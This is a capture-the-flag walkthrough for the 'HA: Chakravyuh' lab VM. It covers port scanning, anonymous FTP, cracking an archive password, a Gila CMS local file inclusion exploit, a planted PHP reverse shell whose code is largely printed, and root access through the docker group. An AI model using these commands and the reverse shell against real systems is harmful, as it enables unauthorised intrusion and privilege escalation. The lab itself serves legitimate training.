HA_CHAKRAVYUH

root@kali:~/Downloads# nmap -p- -A 192.168.22.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 09:47 GMT
Nmap scan report for 192.168.22.131
Host is up (0.00066s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c6:54:93:e8:1c:aa:f7:5f:d0:7d:6e:2e:df:ec:88:69 (RSA)
| 256 d4:b4:2e:96:4e:f7:f6:b7:83:a8:ef:06:6c:80:1d:25 (ECDSA)
|_ 256 66:d0:5b:93:56:c5:7a:2e:60:90:c4:4e:4f:18:5a:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Chakravyuh
65530/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Oct 27 10:46 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.22.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 – secure, fast, stable
|_End of status
MAC Address: 00:0C:29:F8:5E:E7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.22.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds

now on browser

http://192.168.22.131

on another terminal

root@kali:~/Downloads# ftp 192.168.22.131 65530
Connected to 192.168.22.131.
220 (vsFTPd 3.0.3)
Name (192.168.22.131:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Oct 27 10:46 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r–r– 1 ftp ftp 247 Oct 27 10:34 arjun.7z
226 Directory send OK.
ftp> get arjun.7z
local: arjun.7z remote: arjun.7z
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for arjun.7z (247 bytes).
226 Transfer complete.
247 bytes received in 0.00 secs (106.8724 kB/s)
ftp> bye
221 Goodbye.

https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py

root@kali:~/Downloads# python 7z2john.py arjun.7z > hash
root@kali:~/Downloads# john –wordlist = /usr/share/wordlists/rockyou.txt hash

root@kali:~/Downloads# john hash –show
arjun.7z:family

now extract the file with the password and we get secret.txt file.

and in this file

Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=

now try

root@kali:~/Downloads# echo “Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=” | base64 -d
gila:admin@gmail.com:princesa

now on browser

http://192.168.22.131/gila/

http://192.168.22.131/gila/admin

username : admin@gmail.com
password : princesa

click login

root@kali:~/Downloads# searchsploit gila cms
——————————————————————————————————– —————————————-
Exploit Title | Path
| (/usr/share/exploitdb/)
——————————————————————————————————– —————————————-
Gila CMS 1.9.1 – Cross-Site Scripting | exploits/php/webapps/46557.txt
Gila CMS < 1.11.1 – Local File Inclusion | exploits/multiple/webapps/47407.txt ——————————————————————————————————– —————————————- Shellcodes: No Result root@kali:~/Downloads# searchsploit -m 47407 Exploit: Gila CMS < 1.11.1 – Local File Inclusion URL: https://www.exploit-db.com/exploits/47407 Path: /usr/share/exploitdb/exploits/multiple/webapps/47407.txt File Type: ASCII text, with CRLF line terminators Copied to: /root/Downloads/47407.txt root@kali:~/Downloads# cat 47407.txt # Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS # Google Dork: N/A # Date: 04-08-2019 # Exploit Author: Sainadh Jamalpur # Vendor Homepage: https://github.com/GilaCMS/gila # Software Link: https://github.com/GilaCMS/gila # Version: 1.10.9 # Tested on: XAMPP version 3.2.2 in Windows 10 64bit, # CVE : CVE-2019-16679 *********** *Steps to reproduce the Vulnerability* ************* Login into the application as an admin user or equivalent user and go the below link http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts ################################################################ now try on browser http://192.168.22.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd open the index.php put this reverse shell code array(“pipe”, “r”), // stdin is a pipe that the child will read from
1 => array(“pipe”, “w”), // stdout is a pipe that the child will write to
2 => array(“pipe”, “w”) // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit(“ERROR: Can’t spawn shell”);
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won’t
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit(“Successfully opened reverse shell to $ip:$port”);

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit(“ERROR: Shell connection terminated”);
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit(“ERROR: Shell process terminated”);
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process’s STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit(“SOCK READ”);
$input = fread($sock, $chunk_size);
if ($debug) printit(“SOCK: $input”);
fwrite($pipes[0], $input);
}

// If we can read from the process’s STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit(“STDOUT READ”);
$input = fread($pipes[1], $chunk_size);
if ($debug) printit(“STDOUT: $input”);
fwrite($sock, $input);
}

// If we can read from the process’s STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit(“STDERR READ”);
$input = fread($pipes[2], $chunk_size);
if ($debug) printit(“STDERR: $input”);
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we’ve daemonised ourself
// (I can’t figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print “$string\n”;
}
}

?>

save it

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

when we click on index.php

we get the shell

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.22.131.
Ncat: Connection from 192.168.22.131:56630.
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
02:50:07 up 58 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),116(docker)
/bin/sh: 0: can’t access tty; job control turned off
$

$ python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),116(docker)

www-data@ubuntu:/$ docker run -v /root:/mnt -it alpine
docker run -v /root:/mnt -it alpine
/ # cd /mnt
cd /mnt
/mnt # ls
ls
final.txt
/mnt # cat final.txt
cat final.txt

,╓,
╢▀╢
╟Ü╡
▓Ü╢
,╓, ,,╓▄▓▓╣▄╓,, ,╓,
║▓╙╣ ╓g▓▓╣╣╣╣╣╣▓╣╣╣╣╣╣▓▓æw ╣╩║▓
“▓╣ß╗,,g▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣▓W,,╥▓▓╢”
▓▌▓▐╣╣╣▓▓▓╩▀’ ▓Ü▒ ╙╩▓▓▓╣╣╣▌▓]Ñ
╒▓╣╣▓▓▓▀ /▓W║m ╙▓▓▓╣╣▓╗
φ╣╣╣▓▓╩▓║@╖, ╘▓µ╣╛ ,╓@▓║╜▓▓▓╣╣▓
▓╣╣▓▓▓ ▓U▓╓@ ▓Ü▒ Æ▓▓H╢` ╚▓▓╣╣▓
▓╣╣▓▓▀ ╙▓▓╣╣, ╠Ü║ ,▓▓╢Ñ╜ ╙▓▓╣╣▓
╒╣╣╣▓▓ ╙▓╬▓▓▓║╢╢▓▓▓▓║” ╟▓╣╣╣▌
▓╣╣▓▓ Æ▓║╣▒▄▓▓▄╢╢▓▓ ▓▓╣╣▓
╔▓║╣]¢║╢╟▓▓╣▌╣]║╢╜φ╙╢║║¢U╣▒▒█▓▓▌██▌║Ü╣H¢╬▓▓▓φ▓▓▓¢╢▐╣▓▓▓▓▓@[╣║▓W
“╙╙ ‘╙▀╝▓╣╣▓╣’╙╙▀Ü▓▀╙└” ▓▓▒╫███▓█▌╢╫╣’`””╙╩∩╝╙”`▓▓╣╣▓╙╜”` ╙╙”
╟╣╣╣▓L ]▓▓║Ñ▒▒╣@╢▓▓L ,▓▓╣╣▓
╣╣╣▓▓ ╓@╣▓”▀▓▓▓▓▓▀”║╣▓╦, ▓▓╣╣╣”
╙╣╣╣▓▓ ╔╟║╠▓╜ ╟Ü▓ ╙╣╢▓▓φ ▓▓╣╣╣▌
╙╣╣╣▓▓╖ g╢▓▓@” ╢Ü╣ V╢║▓▓ ╓▓▓╣╣╣▀
“▓╣╣▓▓▓@▀ ╙╠▓▓$ ╙▒▓▓▓╣╣▓┘
║▓▓╣▓▓▓&╖ ╣Ü╣` ,φ▓▓▓╣▓▓▓r
,╣╠▓Ç▓╣╣╣▓▓▓▓&æ╖,,║Ü▓,,╓g&▓▓▓▓╣╣╣▓Ü╢║▓ç
,@N╠╝” ╙▓▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣╣▓▀ `╨╣╝@,
▓▓║╜ “▀▀▓▓╣╣▓▓▓╣╣▓▓▀▀╙ ╙╣▓▓

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Kavish Tyagi : https://twitter.com/Tyagi_kavish_

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

@SAKSHAM DIXIT